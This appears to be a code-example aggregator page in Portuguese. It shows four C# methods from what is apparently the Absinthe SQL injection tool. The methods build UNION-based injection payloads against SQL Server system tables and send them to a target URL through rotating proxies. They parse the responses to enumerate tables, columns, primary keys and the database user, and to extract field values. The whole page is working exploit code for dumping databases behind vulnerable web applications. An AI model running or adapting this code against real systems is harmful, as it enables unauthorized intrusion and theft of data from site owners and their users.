Exemplos de Absinthe.Core ParsePage.ParseUnionSelectForNvarchar em C# (CSharp)

Exemplo n.º 1

        private GlobalDS.Field GetFieldData(long TableID, int FieldID)
        {
            GlobalDS.Field retVal = new GlobalDS.Field();

            StringBuilder WhereClause = new StringBuilder();

            WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());


            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            string[] values = PulledData.Split(':');

            retVal.FieldName = values[0];
            retVal.DataType  = GetSqlDataType(Convert.ToInt64(values[1].Trim()));

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (PulledData.Length > 0)
            {
                PulledData       = PulledData.Substring(1, PulledData.Length - 1);
                retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
            }

            return(retVal);
        }

Exemplo n.º 2

        private GlobalDS.Table RetrieveTable(long PreviousTableID)
        {
            GlobalDS.Table retVal = new GlobalDS.Table();

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());

            string ResultPage, ResultText;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            string[] values = ResultText.Split(':');

            retVal.Name     = values[0];
            retVal.ObjectID = Convert.ToInt64(values[1]);

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (ResultText.Length > 0)
            {
                ResultText = ResultText.Substring(1, ResultText.Length - 1);

                retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
            }
            else
            {
                retVal.RecordCount = -1;
            }
            return(retVal);
        }

Exemplo n.º 3

        /// <summary>
        /// Pull the username the database is running as
        /// </summary>
        /// <returns>The database username</returns>
        public string GetDatabaseUsername()
        {
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null);

            string ResultPage;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            string Username = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            return(Username.Substring(1, Username.Length - 2));          // remove brackets
        }

Exemplo n.º 4

        // }}}

        // {{{ GetFieldData
        private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
        {
            DictionaryEntry retVal = new DictionaryEntry();

            retVal.Key   = Column.FieldName;
            retVal.Value = string.Empty;

            if (Column.FieldName.Equals(pk.Name))
            {
                retVal.Value = pk.Value;
                return(retVal);
            }

            StringBuilder SelectClause = new StringBuilder();


            switch (Column.DataType)
            {
            case SqlDbType.BigInt:
            case SqlDbType.SmallInt:
            case SqlDbType.TinyInt:
            case SqlDbType.Int:
            case SqlDbType.Decimal:
            case SqlDbType.DateTime:
            case SqlDbType.Money:
            case SqlDbType.Float:
            case SqlDbType.Real:
            case SqlDbType.SmallDateTime:
            case SqlDbType.SmallMoney:
            case SqlDbType.Timestamp:
            case SqlDbType.UniqueIdentifier:
                //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");

                break;

            case SqlDbType.NChar:
            case SqlDbType.Char:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
            case SqlDbType.NText:
            case SqlDbType.VarChar:
                //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Bit:
                //retVal.Value = GetBitField(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Image:
            case SqlDbType.Binary:
            case SqlDbType.VarBinary:
                // TODO: Figure out how to support this!
                //retVal.Value = null;
                break;
            }

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);


            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            retVal.Value = ResultText.Substring(1, ResultText.Length - 2);

            return(retVal);
        }